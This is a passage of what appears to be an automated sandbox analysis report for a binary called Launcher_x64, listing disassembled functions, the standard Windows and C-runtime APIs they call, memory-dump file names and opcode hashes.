API ID: InfoLocale$ErrorLast
String ID:
API String ID: 661929714-0
Opcode ID: adc16f89f437e3c39ca508a0e82ff152d85a61503694291c66e99e4a799ff056
Instruction ID: 08e71dd7e79cca9c5b3b9357c29de66e9acba1801691bdf8ef307e59747a54d5
Opcode Fuzzy Hash: adc16f89f437e3c39ca508a0e82ff152d85a61503694291c66e99e4a799ff056
Instruction Fuzzy Hash: 4F617E716106079FDB289F28CC82BAEB7A8EF44310F14817AF909C6285F774D990DB71

Function 00D71A60 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00D71B58
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00D71B62
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 00D71B6F

Memory Dump Source

Source File: 00000000.00000002.1668287121.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000000.00000002.1668266269.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668314183.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668332843.0000000000D90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668348190.0000000000D91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668364933.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668379699.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d60000_Launcher_x64.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 470bf3e373d7fdbf697b482ddf9247e58d0952e0461d3bcf142965c68eb4b474
Instruction ID: e0e89d82dceab26d965f7f94a24c4fce11272a27dd49edabbfaa37f8a686bd86
Opcode Fuzzy Hash: 470bf3e373d7fdbf697b482ddf9247e58d0952e0461d3bcf142965c68eb4b474
Instruction Fuzzy Hash: 1D31B5749113289BCB21DF68D8897DDBBB8FF08710F5042DAE40CA7251E7709B858F54

Function 00D7EA8E Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00D7E9E9,?,?,00000008,?,?,00D8539B,00000000), ref: 00D7ECBB

Memory Dump Source

Source File: 00000000.00000002.1668287121.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000000.00000002.1668266269.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668314183.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668332843.0000000000D90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668348190.0000000000D91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668364933.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668379699.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d60000_Launcher_x64.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 6310c792feba82490206b5a1168a4f27bcd3dbffd8fec10942303b70e9c728f0
Instruction ID: 179e9518d970de63db2885d9aaed5de49c90cfa887108ae92e31e3eebcc1ae04
Opcode Fuzzy Hash: 6310c792feba82490206b5a1168a4f27bcd3dbffd8fec10942303b70e9c728f0
Instruction Fuzzy Hash: BBB12A35610608DFD725CF28C48AB657BE0FF49364F29C698E89ACF2A1D335E991CB50

Function 00D696DB Relevance: 1.7, APIs: 1, Instructions: 242COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00D696F1

Memory Dump Source

Source File: 00000000.00000002.1668287121.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000000.00000002.1668266269.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668314183.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668332843.0000000000D90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668348190.0000000000D91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668364933.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668379699.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d60000_Launcher_x64.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 95b7ff81c0339fe5d67abae264fdd229fa43d4ebf0c0f0f790662d0b23cafdd8
Instruction ID: 7f4bc724d3881cc5b4d48787a2e8eb421ed6784ead4e706c5a47c0e0beb2ba1f
Opcode Fuzzy Hash: 95b7ff81c0339fe5d67abae264fdd229fa43d4ebf0c0f0f790662d0b23cafdd8
Instruction Fuzzy Hash: EFA13AB2A117098FDB58DF54E8926A9BBF4FF48324F28952AD415EB360D3749940CFB0

Function 00D7AFF0 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 00D7594A: GetLastError.KERNEL32(00000000,?,00D77CCD), ref: 00D7594E
Part of subcall function 00D7594A: SetLastError.KERNEL32(00000000,?,?,00000028,00D71F93), ref: 00D759F0

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00D7B044

Memory Dump Source

Source File: 00000000.00000002.1668287121.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000000.00000002.1668266269.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668314183.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668332843.0000000000D90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668348190.0000000000D91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668364933.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668379699.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d60000_Launcher_x64.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: 450070413b99ce01f75e21b6bb5da8ef4def9df32e9c6666736d6632d023f7ac
Instruction ID: 11e9911cfa9eb5645f5a8edcdbcdefa62f03233d278d94bb0cec2a33a1f836e9
Opcode Fuzzy Hash: 450070413b99ce01f75e21b6bb5da8ef4def9df32e9c6666736d6632d023f7ac
Instruction Fuzzy Hash: C0218332611206ABDB289A25DC41BBB77A8EF45324B14806BF919C6141FB74DD508B70

Function 00D6DDE2 Relevance: 1.6, Strings: 1, Instructions: 318COMMON

Download Yara Rule

Strings

0, xrefs: 00D6DF66

Memory Dump Source

Source File: 00000000.00000002.1668287121.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000000.00000002.1668266269.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668314183.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668332843.0000000000D90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668348190.0000000000D91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668364933.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668379699.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d60000_Launcher_x64.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 83d65d4a95c123ca091508949ce761d73b89f6eee56525b972ac7f8f265e9158
Instruction ID: 9b715ea91fc8cc8d395101b50819e2dc36bc3d5bb39152ce038fd051b697e9bb
Opcode Fuzzy Hash: 83d65d4a95c123ca091508949ce761d73b89f6eee56525b972ac7f8f265e9158
Instruction Fuzzy Hash: 72B1A274E0064A8BCB34CF68E5556BEB7B2AF15300F180619E5D39B692D732E906CBB1

Function 00D7B110 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

Part of subcall function 00D7594A: GetLastError.KERNEL32(00000000,?,00D77CCD), ref: 00D7594E
Part of subcall function 00D7594A: SetLastError.KERNEL32(00000000,?,?,00000028,00D71F93), ref: 00D759F0

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00D7B164

Memory Dump Source

Source File: 00000000.00000002.1668287121.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000000.00000002.1668266269.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668314183.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668332843.0000000000D90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668348190.0000000000D91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668364933.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668379699.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d60000_Launcher_x64.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: abfb8fdf3f28d1c322c011b4bc369761fbdfb041789d422ea428ac96c1871df2
Instruction ID: e3185c71b5fba142d953f25adf99ffbe3c04e22c01bbd61d723a1e02a7033af5
Opcode Fuzzy Hash: abfb8fdf3f28d1c322c011b4bc369761fbdfb041789d422ea428ac96c1871df2
Instruction Fuzzy Hash: 2311C272611206ABDB14AF28DC56ABA77E8EF05320B14817BE909D7241FB78ED058B70

Function 00D7AC88 Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00D7594A: GetLastError.KERNEL32(00000000,?,00D77CCD), ref: 00D7594E
Part of subcall function 00D7594A: SetLastError.KERNEL32(00000000,?,?,00000028,00D71F93), ref: 00D759F0

EnumSystemLocalesW.KERNEL32(00D7AD30,00000001,00000000,?,-00000050,?,00D7AB13,00000000,-00000002,00000000,?,00000055,?), ref: 00D7ACFA

Memory Dump Source

Source File: 00000000.00000002.1668287121.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000000.00000002.1668266269.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668314183.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668332843.0000000000D90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668348190.0000000000D91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668364933.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668379699.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d60000_Launcher_x64.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 3f87a1caba451855c746082828df5698a453b2e8469aa4f3b7bc77a04590137c
Instruction ID: 587ffc6c6f3806a8425bd02e6264d22e4d14265e14ecdefc71ca27b785887524
Opcode Fuzzy Hash: 3f87a1caba451855c746082828df5698a453b2e8469aa4f3b7bc77a04590137c
Instruction Fuzzy Hash: F411C63A2007019FDB289F39C8916BEB791FBC4369B19842DE94A87B40E7716942CB60

Function 00D7B2BD Relevance: 1.5, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

Part of subcall function 00D7594A: GetLastError.KERNEL32(00000000,?,00D77CCD), ref: 00D7594E
Part of subcall function 00D7594A: SetLastError.KERNEL32(00000000,?,?,00000028,00D71F93), ref: 00D759F0

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00D7AF4C,00000000,00000000,?), ref: 00D7B2E9

Memory Dump Source

Source File: 00000000.00000002.1668287121.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000000.00000002.1668266269.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668314183.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668332843.0000000000D90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668348190.0000000000D91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668364933.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668379699.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d60000_Launcher_x64.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: 4a23a3bcb4ff7f9ecbf97a23dbb117f0e85deca5131cee18980c36c9869672b5
Instruction ID: 0d4317c39174030e23ea0a5718e9b407d16ef38480df10089347d5517b396201
Opcode Fuzzy Hash: 4a23a3bcb4ff7f9ecbf97a23dbb117f0e85deca5131cee18980c36c9869672b5
Instruction Fuzzy Hash: BC01DB36610112EBDB185A2598067FA7764EB40374F55842AEC4AE3180FB70EE81C6B0

Function 00D7AF83 Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00D7594A: GetLastError.KERNEL32(00000000,?,00D77CCD), ref: 00D7594E
Part of subcall function 00D7594A: SetLastError.KERNEL32(00000000,?,?,00000028,00D71F93), ref: 00D759F0

EnumSystemLocalesW.KERNEL32(00D7AFF0,00000001,?,?,-00000050,?,00D7AADB,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?), ref: 00D7AFCD

Memory Dump Source

Source File: 00000000.00000002.1668287121.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000000.00000002.1668266269.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668314183.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668332843.0000000000D90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668348190.0000000000D91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668364933.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668379699.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d60000_Launcher_x64.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 411ed72425494cb0aa74600ff01e2bf93d3746214d7741843db3ad0dc92ac54e
Instruction ID: b8ab432dea2cf69446ba6b51f5df974aa9a36250d7f582fdecd40f8ed8842e1a
Opcode Fuzzy Hash: 411ed72425494cb0aa74600ff01e2bf93d3746214d7741843db3ad0dc92ac54e
Instruction Fuzzy Hash: 32F0F6762003045FDB255F39D891A7EBB91EFC0368B19C42DF94A8B680E7B19C42CB71

Function 00D768FD Relevance: 1.5, APIs: 1, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00D71D11: EnterCriticalSection.KERNEL32(?,?,00D75DD8,?,00D8FC38,00000008,00D75CCA,00000000,00000000,?), ref: 00D71D20

EnumSystemLocalesW.KERNEL32(00D768F0,00000001,00D8FCB8,0000000C,00D762F1,-00000050), ref: 00D76935

Memory Dump Source

Source File: 00000000.00000002.1668287121.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000000.00000002.1668266269.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668314183.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668332843.0000000000D90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668348190.0000000000D91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668364933.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668379699.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d60000_Launcher_x64.jbxd

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: d3e0f3ee8d15d530ee5b983a9d5868daa4cceec8a46471970d01839fc74c946d
Instruction ID: 2bdd0e395564f32ca1fadbe64dcb414deeaae9bddb559bff3418ec6fc69061e5
Opcode Fuzzy Hash: d3e0f3ee8d15d530ee5b983a9d5868daa4cceec8a46471970d01839fc74c946d
Instruction Fuzzy Hash: 49F0373AA00304DFD700EFA8E842B9C77F0EB48721F10812AF524DB3A0DB7599048FA0

Function 00D7B0C5 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00D7594A: GetLastError.KERNEL32(00000000,?,00D77CCD), ref: 00D7594E
Part of subcall function 00D7594A: SetLastError.KERNEL32(00000000,?,?,00000028,00D71F93), ref: 00D759F0

EnumSystemLocalesW.KERNEL32(00D7B110,00000001,?,?,?,00D7AB35,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?,?), ref: 00D7B0FC

Memory Dump Source

Source File: 00000000.00000002.1668287121.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000000.00000002.1668266269.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668314183.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668332843.0000000000D90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668348190.0000000000D91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668364933.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668379699.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d60000_Launcher_x64.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 6b44eee134c5614f862461b40f8f7c5609b882c177df29fcf1016169af8de50c
Instruction ID: 557a3f7a92e367829a8c28301abbc0d9c94c3c2c0a1b7aa2da24d8b92643e057
Opcode Fuzzy Hash: 6b44eee134c5614f862461b40f8f7c5609b882c177df29fcf1016169af8de50c
Instruction Fuzzy Hash: F4F0A03630020957CB049B35D85576B7BA4EBC2720B4A8059EA098B290D7759846CBA0

Function 00D763F5 Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,00000000,?,00D70A63,?,20001004,00000000,00000002,?,?,00D6F971), ref: 00D76429

Memory Dump Source

Source File: 00000000.00000002.1668287121.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000000.00000002.1668266269.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668314183.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668332843.0000000000D90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668348190.0000000000D91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668364933.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668379699.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d60000_Launcher_x64.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: d892bab4f70d0d3d784baee1a090594f99be9c09d62cd52efd9919fa6f7262e9
Instruction ID: b09df70d5fb58b5bf631f7fa2faf41a7bb2d37937f000de2a95adc91c919c4e6
Opcode Fuzzy Hash: d892bab4f70d0d3d784baee1a090594f99be9c09d62cd52efd9919fa6f7262e9
Instruction Fuzzy Hash: 34E04F31500628BBCF122F61DC05EAE7F66EF54754F08C020FD0966621EB31C921ABF5

Function 00D69A67 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00009B90), ref: 00D69A6C

Memory Dump Source

Source File: 00000000.00000002.1668287121.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000000.00000002.1668266269.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668314183.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668332843.0000000000D90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668348190.0000000000D91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668364933.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668379699.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d60000_Launcher_x64.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: c59b0bbf44b573fe33e153cc80deeedda2ab4c6e8e909ccd6f96974aad84986d
Instruction ID: 60f4b29b170453c060c727629d665c6f9c133828f915b119d25e97e387858efc
Opcode Fuzzy Hash: c59b0bbf44b573fe33e153cc80deeedda2ab4c6e8e909ccd6f96974aad84986d
Instruction Fuzzy Hash:

Function 00D77020 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00D77020

Memory Dump Source

Source File: 00000000.00000002.1668287121.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000000.00000002.1668266269.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668314183.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668332843.0000000000D90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668348190.0000000000D91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668364933.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668379699.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d60000_Launcher_x64.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 79add0a57c75fa5a6dfc860bb8b129bb40f16e88cdd155eab8acc21bac7bd934
Instruction ID: 93e4b20810264d03240c9da2fec5279515dd24679ad2442f74ffd46903e10af1
Opcode Fuzzy Hash: 79add0a57c75fa5a6dfc860bb8b129bb40f16e88cdd155eab8acc21bac7bd934
Instruction Fuzzy Hash: 4CA012342003028B53404F315904A0C37E4994128030440569010C0320D72440406F10

Function 00D61BA0 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1668287121.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000000.00000002.1668266269.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668314183.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668332843.0000000000D90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668348190.0000000000D91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668364933.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668379699.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d60000_Launcher_x64.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f8dea80b8770cce831966e330374367912e5812ec179aa93f16c77d62f56bc0
Instruction ID: c353db78970028255327967b1bf9447b6396045c1a162166ffb86956e92b4b88
Opcode Fuzzy Hash: 1f8dea80b8770cce831966e330374367912e5812ec179aa93f16c77d62f56bc0
Instruction Fuzzy Hash: 0DD0923A641A59AFC610CF49E440D41F7B8FB8E770B154166EA4893B20C331FC11CAE0

Function 00D841D2 Relevance: 12.2, APIs: 8, Instructions: 248COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?,?,?,?,?,00D841BD,?,?,?,?,?,?,?,?,?), ref: 00D84278
__alloca_probe_16.LIBCMT ref: 00D84333
__alloca_probe_16.LIBCMT ref: 00D843C2
__freea.LIBCMT ref: 00D8440D
__freea.LIBCMT ref: 00D84413
__freea.LIBCMT ref: 00D84449
__freea.LIBCMT ref: 00D8444F
__freea.LIBCMT ref: 00D8445F

Memory Dump Source

Source File: 00000000.00000002.1668287121.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000000.00000002.1668266269.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668314183.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668332843.0000000000D90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668348190.0000000000D91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668364933.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668379699.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d60000_Launcher_x64.jbxd

Similarity

API ID: __freea$__alloca_probe_16$Info
String ID:
API String ID: 127012223-0
Opcode ID: c1ca8deeccd68d50247960c7d48acd449f55208c01de866e9b8b7913a48996ad
Instruction ID: 49a35b566737594274ff105722d898b4ce4c5f8dac78fe18e3ada44ba398b050
Opcode Fuzzy Hash: c1ca8deeccd68d50247960c7d48acd449f55208c01de866e9b8b7913a48996ad
Instruction Fuzzy Hash: A371E27290424BABDF20BF98CC52BAE7BB9EF45314F294059F914B7281E6B5DC0087B4

Function 00D785B6 Relevance: 10.8, APIs: 7, Instructions: 329COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00D7863C

Memory Dump Source

Source File: 00000000.00000002.1668287121.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000000.00000002.1668266269.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668314183.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668332843.0000000000D90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668348190.0000000000D91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668364933.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668379699.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d60000_Launcher_x64.jbxd

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: b258c23f8f5adf4b5b829db56bad2fb8a7efe0f2db3ca2ba46b92337591bc9f9
Instruction ID: 934878f86550f09cd9263c6ed98f554efb05fbd23718919bf43427b62466e413
Opcode Fuzzy Hash: b258c23f8f5adf4b5b829db56bad2fb8a7efe0f2db3ca2ba46b92337591bc9f9
Instruction Fuzzy Hash: BAB15972E40355AFDB158F28CC85BAEBBA5EF55310F288155E809AF282FA70D901D7B1

Function 00D6ABB0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00D6ABE7
___except_validate_context_record.LIBVCRUNTIME ref: 00D6ABEF
_ValidateLocalCookies.LIBCMT ref: 00D6AC78
__IsNonwritableInCurrentImage.LIBCMT ref: 00D6ACA3
_ValidateLocalCookies.LIBCMT ref: 00D6ACF8

Strings

csm, xrefs: 00D6AC8D

Memory Dump Source

Source File: 00000000.00000002.1668287121.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000000.00000002.1668266269.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
